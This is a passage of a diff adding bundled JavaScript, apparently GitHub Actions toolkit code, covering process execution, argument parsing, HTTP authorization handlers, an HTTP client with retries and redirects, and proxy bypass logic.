+ } + cp.on('error', (err) => { + state.processError = err.message; + state.processExited = true; + state.processClosed = true; + state.CheckComplete(); + }); + cp.on('exit', (code) => { + state.processExitCode = code; + state.processExited = true; + this._debug(`Exit code ${code} received from tool '${this.toolPath}'`); + state.CheckComplete(); + }); + cp.on('close', (code) => { + state.processExitCode = code; + state.processExited = true; + state.processClosed = true; + this._debug(`STDIO streams have closed for tool '${this.toolPath}'`); + state.CheckComplete(); + }); + state.on('done', (error, exitCode) => { + if (stdbuffer.length > 0) { + this.emit('stdline', stdbuffer); + } + if (errbuffer.length > 0) { + this.emit('errline', errbuffer); + } + cp.removeAllListeners(); + if (error) { + reject(error); + } + else { + resolve(exitCode); + } + }); + if (this.options.input) { + if (!cp.stdin) { + throw new Error('child process missing stdin'); + } + cp.stdin.end(this.options.input); + } + })); + }); + } +} +exports.ToolRunner = ToolRunner; +/** + * Convert an arg string to an array of args. Handles escaping + * + * @param argString string of arguments + * @returns string[] array of arguments + */ +function argStringToArray(argString) { + const args = []; + let inQuotes = false; + let escaped = false; + let arg = ''; + function append(c) { + // we only escape double quotes. + if (escaped && c !== '"') { + arg += '\\'; + } + arg += c; + escaped = false; + } + for (let i = 0; i < argString.length; i++) { + const c = argString.charAt(i); + if (c === '"') { + if (!escaped) { + inQuotes = !inQuotes; + } + else { + append(c); + } + continue; + } + if (c === '\\' && escaped) { + append(c); + continue; + } + if (c === '\\' && inQuotes) { + escaped = true; + continue; + } + if (c === ' ' && !inQuotes) { + if (arg.length > 0) { + args.push(arg); + arg = ''; + } + continue; + } + append(c); + } + if (arg.length > 0) { + args.push(arg.trim()); + } + return args; +} +exports.argStringToArray = argStringToArray; +class ExecState extends events.EventEmitter { + constructor(options, toolPath) { + super(); + this.processClosed = false; // tracks whether the process has exited and stdio is closed + this.processError = ''; + this.processExitCode = 0; + this.processExited = false; // tracks whether the process has exited + this.processStderr = false; // tracks whether stderr was written to + this.delay = 10000; // 10 seconds + this.done = false; + this.timeout = null; + if (!toolPath) { + throw new Error('toolPath must not be empty'); + } + this.options = options; + this.toolPath = toolPath; + if (options.delay) { + this.delay = options.delay; + } + } + CheckComplete() { + if (this.done) { + return; + } + if (this.processClosed) { + this._setResult(); + } + else if (this.processExited) { + this.timeout = timers_1.setTimeout(ExecState.HandleTimeout, this.delay, this); + } + } + _debug(message) { + this.emit('debug', message); + } + _setResult() { + // determine whether there is an error + let error; + if (this.processExited) { + if (this.processError) { + error = new Error(`There was an error when attempting to execute the process '${this.toolPath}'. This may indicate the process failed to start. Error: ${this.processError}`); + } + else if (this.processExitCode !== 0 && !this.options.ignoreReturnCode) { + error = new Error(`The process '${this.toolPath}' failed with exit code ${this.processExitCode}`); + } + else if (this.processStderr && this.options.failOnStdErr) { + error = new Error(`The process '${this.toolPath}' failed because one or more lines were written to the STDERR stream`); + } + } + // clear the timeout + if (this.timeout) { + clearTimeout(this.timeout); + this.timeout = null; + } + this.done = true; + this.emit('done', error, this.processExitCode); + } + static HandleTimeout(state) { + if (state.done) { + return; + } + if (!state.processClosed && state.processExited) { + const message = `The STDIO streams did not close within ${state.delay / + 1000} seconds of the exit event from process '${state.toolPath}'. This may indicate a child process inherited the STDIO streams and has not yet exited.`; + state._debug(message); + } + state._setResult(); + } +} +//# sourceMappingURL=toolrunner.js.map + +/***/ }), + +/***/ 5526: +/***/ (function(__unused_webpack_module, exports) { + +"use strict"; + +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.PersonalAccessTokenCredentialHandler = exports.BearerCredentialHandler = exports.BasicCredentialHandler = void 0; +class BasicCredentialHandler { + constructor(username, password) { + this.username = username; + this.password = password; + } + prepareRequest(options) { + if (!options.headers) { + throw Error('The request has no headers'); + } + options.headers['Authorization'] = `Basic ${Buffer.from(`${this.username}:${this.password}`).toString('base64')}`; + } + // This handler cannot handle 401 + canHandleAuthentication() { + return false; + } + handleAuthentication() { + return __awaiter(this, void 0, void 0, function* () { + throw new Error('not implemented'); + }); + } +} +exports.BasicCredentialHandler = BasicCredentialHandler; +class BearerCredentialHandler { + constructor(token) { + this.token = token; + } + // currently implements pre-authorization + // TODO: support preAuth = false where it hooks on 401 + prepareRequest(options) { + if (!options.headers) { + throw Error('The request has no headers'); + } + options.headers['Authorization'] = `Bearer ${this.token}`; + } + // This handler cannot handle 401 + canHandleAuthentication() { + return false; + } + handleAuthentication() { + return __awaiter(this, void 0, void 0, function* () { + throw new Error('not implemented'); + }); + } +} +exports.BearerCredentialHandler = BearerCredentialHandler; +class PersonalAccessTokenCredentialHandler { + constructor(token) { + this.token = token; + } + // currently implements pre-authorization + // TODO: support preAuth = false where it hooks on 401 + prepareRequest(options) { + if (!options.headers) { + throw Error('The request has no headers'); + } + options.headers['Authorization'] = `Basic ${Buffer.from(`PAT:${this.token}`).toString('base64')}`; + } + // This handler cannot handle 401 + canHandleAuthentication() { + return false; + } + handleAuthentication() { + return __awaiter(this, void 0, void 0, function* () { + throw new Error('not implemented'); + }); + } +} +exports.PersonalAccessTokenCredentialHandler = PersonalAccessTokenCredentialHandler; +//# sourceMappingURL=auth.js.map + +/***/ }), + +/***/ 6255: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +/* eslint-disable @typescript-eslint/no-explicit-any */ +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.HttpClient = exports.isHttps = exports.HttpClientResponse = exports.HttpClientError = exports.getProxyUrl = exports.MediaTypes = exports.Headers = exports.HttpCodes = void 0; +const http = __importStar(__nccwpck_require__(3685)); +const https = __importStar(__nccwpck_require__(5687)); +const pm = __importStar(__nccwpck_require__(9835)); +const tunnel = __importStar(__nccwpck_require__(4294)); +const undici_1 = __nccwpck_require__(1773); +var HttpCodes; +(function (HttpCodes) { + HttpCodes[HttpCodes["OK"] = 200] = "OK"; + HttpCodes[HttpCodes["MultipleChoices"] = 300] = "MultipleChoices"; + HttpCodes[HttpCodes["MovedPermanently"] = 301] = "MovedPermanently"; + HttpCodes[HttpCodes["ResourceMoved"] = 302] = "ResourceMoved"; + HttpCodes[HttpCodes["SeeOther"] = 303] = "SeeOther"; + HttpCodes[HttpCodes["NotModified"] = 304] = "NotModified"; + HttpCodes[HttpCodes["UseProxy"] = 305] = "UseProxy"; + HttpCodes[HttpCodes["SwitchProxy"] = 306] = "SwitchProxy"; + HttpCodes[HttpCodes["TemporaryRedirect"] = 307] = "TemporaryRedirect"; + HttpCodes[HttpCodes["PermanentRedirect"] = 308] = "PermanentRedirect"; + HttpCodes[HttpCodes["BadRequest"] = 400] = "BadRequest"; + HttpCodes[HttpCodes["Unauthorized"] = 401] = "Unauthorized"; + HttpCodes[HttpCodes["PaymentRequired"] = 402] = "PaymentRequired"; + HttpCodes[HttpCodes["Forbidden"] = 403] = "Forbidden"; + HttpCodes[HttpCodes["NotFound"] = 404] = "NotFound"; + HttpCodes[HttpCodes["MethodNotAllowed"] = 405] = "MethodNotAllowed"; + HttpCodes[HttpCodes["NotAcceptable"] = 406] = "NotAcceptable"; + HttpCodes[HttpCodes["ProxyAuthenticationRequired"] = 407] = "ProxyAuthenticationRequired"; + HttpCodes[HttpCodes["RequestTimeout"] = 408] = "RequestTimeout"; + HttpCodes[HttpCodes["Conflict"] = 409] = "Conflict"; + HttpCodes[HttpCodes["Gone"] = 410] = "Gone"; + HttpCodes[HttpCodes["TooManyRequests"] = 429] = "TooManyRequests"; + HttpCodes[HttpCodes["InternalServerError"] = 500] = "InternalServerError"; + HttpCodes[HttpCodes["NotImplemented"] = 501] = "NotImplemented"; + HttpCodes[HttpCodes["BadGateway"] = 502] = "BadGateway"; + HttpCodes[HttpCodes["ServiceUnavailable"] = 503] = "ServiceUnavailable"; + HttpCodes[HttpCodes["GatewayTimeout"] = 504] = "GatewayTimeout"; +})(HttpCodes || (exports.HttpCodes = HttpCodes = {})); +var Headers; +(function (Headers) { + Headers["Accept"] = "accept"; + Headers["ContentType"] = "content-type"; +})(Headers || (exports.Headers = Headers = {})); +var MediaTypes; +(function (MediaTypes) { + MediaTypes["ApplicationJson"] = "application/json"; +})(MediaTypes || (exports.MediaTypes = MediaTypes = {})); +/** + * Returns the proxy URL, depending upon the supplied url and proxy environment variables. + * @param serverUrl The server URL where the request will be sent. For example, https://api.github.com + */ +function getProxyUrl(serverUrl) { + const proxyUrl = pm.getProxyUrl(new URL(serverUrl)); + return proxyUrl ? proxyUrl.href : ''; +} +exports.getProxyUrl = getProxyUrl; +const HttpRedirectCodes = [ + HttpCodes.MovedPermanently, + HttpCodes.ResourceMoved, + HttpCodes.SeeOther, + HttpCodes.TemporaryRedirect, + HttpCodes.PermanentRedirect +]; +const HttpResponseRetryCodes = [ + HttpCodes.BadGateway, + HttpCodes.ServiceUnavailable, + HttpCodes.GatewayTimeout +]; +const RetryableHttpVerbs = ['OPTIONS', 'GET', 'DELETE', 'HEAD']; +const ExponentialBackoffCeiling = 10; +const ExponentialBackoffTimeSlice = 5; +class HttpClientError extends Error { + constructor(message, statusCode) { + super(message); + this.name = 'HttpClientError'; + this.statusCode = statusCode; + Object.setPrototypeOf(this, HttpClientError.prototype); + } +} +exports.HttpClientError = HttpClientError; +class HttpClientResponse { + constructor(message) { + this.message = message; + } + readBody() { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { + let output = Buffer.alloc(0); + this.message.on('data', (chunk) => { + output = Buffer.concat([output, chunk]); + }); + this.message.on('end', () => { + resolve(output.toString()); + }); + })); + }); + } + readBodyBuffer() { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { + const chunks = []; + this.message.on('data', (chunk) => { + chunks.push(chunk); + }); + this.message.on('end', () => { + resolve(Buffer.concat(chunks)); + }); + })); + }); + } +} +exports.HttpClientResponse = HttpClientResponse; +function isHttps(requestUrl) { + const parsedUrl = new URL(requestUrl); + return parsedUrl.protocol === 'https:'; +} +exports.isHttps = isHttps; +class HttpClient { + constructor(userAgent, handlers, requestOptions) { + this._ignoreSslError = false; + this._allowRedirects = true; + this._allowRedirectDowngrade = false; + this._maxRedirects = 50; + this._allowRetries = false; + this._maxRetries = 1; + this._keepAlive = false; + this._disposed = false; + this.userAgent = userAgent; + this.handlers = handlers || []; + this.requestOptions = requestOptions; + if (requestOptions) { + if (requestOptions.ignoreSslError != null) { + this._ignoreSslError = requestOptions.ignoreSslError; + } + this._socketTimeout = requestOptions.socketTimeout; + if (requestOptions.allowRedirects != null) { + this._allowRedirects = requestOptions.allowRedirects; + } + if (requestOptions.allowRedirectDowngrade != null) { + this._allowRedirectDowngrade = requestOptions.allowRedirectDowngrade; + } + if (requestOptions.maxRedirects != null) { + this._maxRedirects = Math.max(requestOptions.maxRedirects, 0); + } + if (requestOptions.keepAlive != null) { + this._keepAlive = requestOptions.keepAlive; + } + if (requestOptions.allowRetries != null) { + this._allowRetries = requestOptions.allowRetries; + } + if (requestOptions.maxRetries != null) { + this._maxRetries = requestOptions.maxRetries; + } + } + } + options(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('OPTIONS', requestUrl, null, additionalHeaders || {}); + }); + } + get(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('GET', requestUrl, null, additionalHeaders || {}); + }); + } + del(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('DELETE', requestUrl, null, additionalHeaders || {}); + }); + } + post(requestUrl, data, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('POST', requestUrl, data, additionalHeaders || {}); + }); + } + patch(requestUrl, data, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('PATCH', requestUrl, data, additionalHeaders || {}); + }); + } + put(requestUrl, data, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('PUT', requestUrl, data, additionalHeaders || {}); + }); + } + head(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('HEAD', requestUrl, null, additionalHeaders || {}); + }); + } + sendStream(verb, requestUrl, stream, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request(verb, requestUrl, stream, additionalHeaders); + }); + } + /** + * Gets a typed object from an endpoint + * Be aware that not found returns a null. Other errors (4xx, 5xx) reject the promise + */ + getJson(requestUrl, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + const res = yield this.get(requestUrl, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + postJson(requestUrl, obj, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + const data = JSON.stringify(obj, null, 2); + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); + const res = yield this.post(requestUrl, data, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + putJson(requestUrl, obj, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + const data = JSON.stringify(obj, null, 2); + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); + const res = yield this.put(requestUrl, data, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + patchJson(requestUrl, obj, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + const data = JSON.stringify(obj, null, 2); + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); + const res = yield this.patch(requestUrl, data, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + /** + * Makes a raw http request. + * All other methods such as get, post, patch, and request ultimately call this. + * Prefer get, del, post and patch + */ + request(verb, requestUrl, data, headers) { + return __awaiter(this, void 0, void 0, function* () { + if (this._disposed) { + throw new Error('Client has already been disposed.'); + } + const parsedUrl = new URL(requestUrl); + let info = this._prepareRequest(verb, parsedUrl, headers); + // Only perform retries on reads since writes may not be idempotent. + const maxTries = this._allowRetries && RetryableHttpVerbs.includes(verb) + ? this._maxRetries + 1 + : 1; + let numTries = 0; + let response; + do { + response = yield this.requestRaw(info, data); + // Check if it's an authentication challenge + if (response && + response.message && + response.message.statusCode === HttpCodes.Unauthorized) { + let authenticationHandler; + for (const handler of this.handlers) { + if (handler.canHandleAuthentication(response)) { + authenticationHandler = handler; + break; + } + } + if (authenticationHandler) { + return authenticationHandler.handleAuthentication(this, info, data); + } + else { + // We have received an unauthorized response but have no handlers to handle it. + // Let the response return to the caller. + return response; + } + } + let redirectsRemaining = this._maxRedirects; + while (response.message.statusCode && + HttpRedirectCodes.includes(response.message.statusCode) && + this._allowRedirects && + redirectsRemaining > 0) { + const redirectUrl = response.message.headers['location']; + if (!redirectUrl) { + // if there's no location to redirect to, we won't + break; + } + const parsedRedirectUrl = new URL(redirectUrl); + if (parsedUrl.protocol === 'https:' && + parsedUrl.protocol !== parsedRedirectUrl.protocol && + !this._allowRedirectDowngrade) { + throw new Error('Redirect from HTTPS to HTTP protocol. This downgrade is not allowed for security reasons. If you want to allow this behavior, set the allowRedirectDowngrade option to true.'); + } + // we need to finish reading the response before reassigning response + // which will leak the open socket. + yield response.readBody(); + // strip authorization header if redirected to a different hostname + if (parsedRedirectUrl.hostname !== parsedUrl.hostname) { + for (const header in headers) { + // header names are case insensitive + if (header.toLowerCase() === 'authorization') { + delete headers[header]; + } + } + } + // let's make the request with the new redirectUrl + info = this._prepareRequest(verb, parsedRedirectUrl, headers); + response = yield this.requestRaw(info, data); + redirectsRemaining--; + } + if (!response.message.statusCode || + !HttpResponseRetryCodes.includes(response.message.statusCode)) { + // If not a retry code, return immediately instead of retrying + return response; + } + numTries += 1; + if (numTries < maxTries) { + yield response.readBody(); + yield this._performExponentialBackoff(numTries); + } + } while (numTries < maxTries); + return response; + }); + } + /** + * Needs to be called if keepAlive is set to true in request options. + */ + dispose() { + if (this._agent) { + this._agent.destroy(); + } + this._disposed = true; + } + /** + * Raw request. + * @param info + * @param data + */ + requestRaw(info, data) { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve, reject) => { + function callbackForResult(err, res) { + if (err) { + reject(err); + } + else if (!res) { + // If `err` is not passed, then `res` must be passed. + reject(new Error('Unknown error')); + } + else { + resolve(res); + } + } + this.requestRawWithCallback(info, data, callbackForResult); + }); + }); + } + /** + * Raw request with callback. + * @param info + * @param data + * @param onResult + */ + requestRawWithCallback(info, data, onResult) { + if (typeof data === 'string') { + if (!info.options.headers) { + info.options.headers = {}; + } + info.options.headers['Content-Length'] = Buffer.byteLength(data, 'utf8'); + } + let callbackCalled = false; + function handleResult(err, res) { + if (!callbackCalled) { + callbackCalled = true; + onResult(err, res); + } + } + const req = info.httpModule.request(info.options, (msg) => { + const res = new HttpClientResponse(msg); + handleResult(undefined, res); + }); + let socket; + req.on('socket', sock => { + socket = sock; + }); + // If we ever get disconnected, we want the socket to timeout eventually + req.setTimeout(this._socketTimeout || 3 * 60000, () => { + if (socket) { + socket.end(); + } + handleResult(new Error(`Request timeout: ${info.options.path}`)); + }); + req.on('error', function (err) { + // err has statusCode property + // res should have headers + handleResult(err); + }); + if (data && typeof data === 'string') { + req.write(data, 'utf8'); + } + if (data && typeof data !== 'string') { + data.on('close', function () { + req.end(); + }); + data.pipe(req); + } + else { + req.end(); + } + } + /** + * Gets an http agent. This function is useful when you need an http agent that handles + * routing through a proxy server - depending upon the url and proxy environment variables. + * @param serverUrl The server URL where the request will be sent. For example, https://api.github.com + */ + getAgent(serverUrl) { + const parsedUrl = new URL(serverUrl); + return this._getAgent(parsedUrl); + } + getAgentDispatcher(serverUrl) { + const parsedUrl = new URL(serverUrl); + const proxyUrl = pm.getProxyUrl(parsedUrl); + const useProxy = proxyUrl && proxyUrl.hostname; + if (!useProxy) { + return; + } + return this._getProxyAgentDispatcher(parsedUrl, proxyUrl); + } + _prepareRequest(method, requestUrl, headers) { + const info = {}; + info.parsedUrl = requestUrl; + const usingSsl = info.parsedUrl.protocol === 'https:'; + info.httpModule = usingSsl ? https : http; + const defaultPort = usingSsl ? 443 : 80; + info.options = {}; + info.options.host = info.parsedUrl.hostname; + info.options.port = info.parsedUrl.port + ? parseInt(info.parsedUrl.port) + : defaultPort; + info.options.path = + (info.parsedUrl.pathname || '') + (info.parsedUrl.search || ''); + info.options.method = method; + info.options.headers = this._mergeHeaders(headers); + if (this.userAgent != null) { + info.options.headers['user-agent'] = this.userAgent; + } + info.options.agent = this._getAgent(info.parsedUrl); + // gives handlers an opportunity to participate + if (this.handlers) { + for (const handler of this.handlers) { + handler.prepareRequest(info.options); + } + } + return info; + } + _mergeHeaders(headers) { + if (this.requestOptions && this.requestOptions.headers) { + return Object.assign({}, lowercaseKeys(this.requestOptions.headers), lowercaseKeys(headers || {})); + } + return lowercaseKeys(headers || {}); + } + _getExistingOrDefaultHeader(additionalHeaders, header, _default) { + let clientHeader; + if (this.requestOptions && this.requestOptions.headers) { + clientHeader = lowercaseKeys(this.requestOptions.headers)[header]; + } + return additionalHeaders[header] || clientHeader || _default; + } + _getAgent(parsedUrl) { + let agent; + const proxyUrl = pm.getProxyUrl(parsedUrl); + const useProxy = proxyUrl && proxyUrl.hostname; + if (this._keepAlive && useProxy) { + agent = this._proxyAgent; + } + if (this._keepAlive && !useProxy) { + agent = this._agent; + } + // if agent is already assigned use that agent. + if (agent) { + return agent; + } + const usingSsl = parsedUrl.protocol === 'https:'; + let maxSockets = 100; + if (this.requestOptions) { + maxSockets = this.requestOptions.maxSockets || http.globalAgent.maxSockets; + } + // This is `useProxy` again, but we need to check `proxyURl` directly for TypeScripts's flow analysis. + if (proxyUrl && proxyUrl.hostname) { + const agentOptions = { + maxSockets, + keepAlive: this._keepAlive, + proxy: Object.assign(Object.assign({}, ((proxyUrl.username || proxyUrl.password) && { + proxyAuth: `${proxyUrl.username}:${proxyUrl.password}` + })), { host: proxyUrl.hostname, port: proxyUrl.port }) + }; + let tunnelAgent; + const overHttps = proxyUrl.protocol === 'https:'; + if (usingSsl) { + tunnelAgent = overHttps ? tunnel.httpsOverHttps : tunnel.httpsOverHttp; + } + else { + tunnelAgent = overHttps ? tunnel.httpOverHttps : tunnel.httpOverHttp; + } + agent = tunnelAgent(agentOptions); + this._proxyAgent = agent; + } + // if reusing agent across request and tunneling agent isn't assigned create a new agent + if (this._keepAlive && !agent) { + const options = { keepAlive: this._keepAlive, maxSockets }; + agent = usingSsl ? new https.Agent(options) : new http.Agent(options); + this._agent = agent; + } + // if not using private agent and tunnel agent isn't setup then use global agent + if (!agent) { + agent = usingSsl ? https.globalAgent : http.globalAgent; + } + if (usingSsl && this._ignoreSslError) { + // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process + // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options + // we have to cast it to any and change it directly + agent.options = Object.assign(agent.options || {}, { + rejectUnauthorized: false + }); + } + return agent; + } + _getProxyAgentDispatcher(parsedUrl, proxyUrl) { + let proxyAgent; + if (this._keepAlive) { + proxyAgent = this._proxyAgentDispatcher; + } + // if agent is already assigned use that agent. + if (proxyAgent) { + return proxyAgent; + } + const usingSsl = parsedUrl.protocol === 'https:'; + proxyAgent = new undici_1.ProxyAgent(Object.assign({ uri: proxyUrl.href, pipelining: !this._keepAlive ? 0 : 1 }, ((proxyUrl.username || proxyUrl.password) && { + token: `${proxyUrl.username}:${proxyUrl.password}` + }))); + this._proxyAgentDispatcher = proxyAgent; + if (usingSsl && this._ignoreSslError) { + // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process + // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options + // we have to cast it to any and change it directly + proxyAgent.options = Object.assign(proxyAgent.options.requestTls || {}, { + rejectUnauthorized: false + }); + } + return proxyAgent; + } + _performExponentialBackoff(retryNumber) { + return __awaiter(this, void 0, void 0, function* () { + retryNumber = Math.min(ExponentialBackoffCeiling, retryNumber); + const ms = ExponentialBackoffTimeSlice * Math.pow(2, retryNumber); + return new Promise(resolve => setTimeout(() => resolve(), ms)); + }); + } + _processResponse(res, options) { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { + const statusCode = res.message.statusCode || 0; + const response = { + statusCode, + result: null, + headers: {} + }; + // not found leads to null obj returned + if (statusCode === HttpCodes.NotFound) { + resolve(response); + } + // get the result from the body + function dateTimeDeserializer(key, value) { + if (typeof value === 'string') { + const a = new Date(value); + if (!isNaN(a.valueOf())) { + return a; + } + } + return value; + } + let obj; + let contents; + try { + contents = yield res.readBody(); + if (contents && contents.length > 0) { + if (options && options.deserializeDates) { + obj = JSON.parse(contents, dateTimeDeserializer); + } + else { + obj = JSON.parse(contents); + } + response.result = obj; + } + response.headers = res.message.headers; + } + catch (err) { + // Invalid resource (contents not json); leaving result obj null + } + // note that 3xx redirects are handled by the http layer. + if (statusCode > 299) { + let msg; + // if exception/error in body, attempt to get better error + if (obj && obj.message) { + msg = obj.message; + } + else if (contents && contents.length > 0) { + // it may be the case that the exception is in the body message as string + msg = contents; + } + else { + msg = `Failed request: (${statusCode})`; + } + const err = new HttpClientError(msg, statusCode); + err.result = response.result; + reject(err); + } + else { + resolve(response); + } + })); + }); + } +} +exports.HttpClient = HttpClient; +const lowercaseKeys = (obj) => Object.keys(obj).reduce((c, k) => ((c[k.toLowerCase()] = obj[k]), c), {}); +//# sourceMappingURL=index.js.map + +/***/ }), + +/***/ 9835: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.checkBypass = exports.getProxyUrl = void 0; +function getProxyUrl(reqUrl) { + const usingSsl = reqUrl.protocol === 'https:'; + if (checkBypass(reqUrl)) { + return undefined; + } + const proxyVar = (() => { + if (usingSsl) { + return process.env['https_proxy'] || process.env['HTTPS_PROXY']; + } + else { + return process.env['http_proxy'] || process.env['HTTP_PROXY']; + } + })(); + if (proxyVar) { + try { + return new URL(proxyVar); + } + catch (_a) { + if (!proxyVar.startsWith('http://') && !proxyVar.startsWith('https://')) + return new URL(`http://${proxyVar}`); + } + } + else { + return undefined; + } +} +exports.getProxyUrl = getProxyUrl; +function checkBypass(reqUrl) { + if (!reqUrl.hostname) { + return false; + } + const reqHost = reqUrl.hostname; + if (isLoopbackAddress(reqHost)) { + return true; + } + const noProxy = process.env['no_proxy'] || process.env['NO_PROXY'] || ''; + if (!noProxy) { + return false; + } + // Determine the request port + let reqPort; + if (reqUrl.port) { + reqPort = Number(reqUrl.port); + } + else if (reqUrl.protocol === 'http:') { + reqPort = 80; + } + else if (reqUrl.protocol === 'https:') { + reqPort = 443; + } + // Format the request hostname and hostname with port + const upperReqHosts = [reqUrl.hostname.toUpperCase()]; + if (typeof reqPort === 'number') { + upperReqHosts.push(`${upperReqHosts[0]}:${reqPort}`); + } + // Compare request host against noproxy + for (const upperNoProxyItem of noProxy + .split(',') + .map(x => x.trim().toUpperCase()) + .filter(x => x)) { + if (upperNoProxyItem === '*' || + upperReqHosts.some(x => x === upperNoProxyItem || + x.endsWith(`.${upperNoProxyItem}`) || + (upperNoProxyItem.startsWith('.') && + x.endsWith(`${upperNoProxyItem}`)))) { + return true; + } + } + return false; +} +exports.checkBypass = checkBypass; +function isLoopbackAddress(host) { + const hostLower = host.toLowerCase(); + return (hostLower === 'localhost' || + hostLower.startsWith('127.') || + hostLower.startsWith('[::1]') || + hostLower.startsWith('[0:0:0:0:0:0:0:1]')); +} +//# sourceMappingURL=proxy.js.map + +/***/ }), + +/***/ 1962: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +var _a; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.getCmdPath = exports.tryGetExecutablePath = exports.isRooted = exports.isDirectory = exports.exists = exports.READONLY = exports.UV_FS_O_EXLOCK = exports.IS_WINDOWS = exports.unlink = exports.symlink = exports.stat = exports.rmdir = exports.rm = exports.rename = exports.readlink = exports.readdir = exports.open = exports.mkdir = exports.lstat = exports.copyFile = exports.chmod = void 0; +const fs = 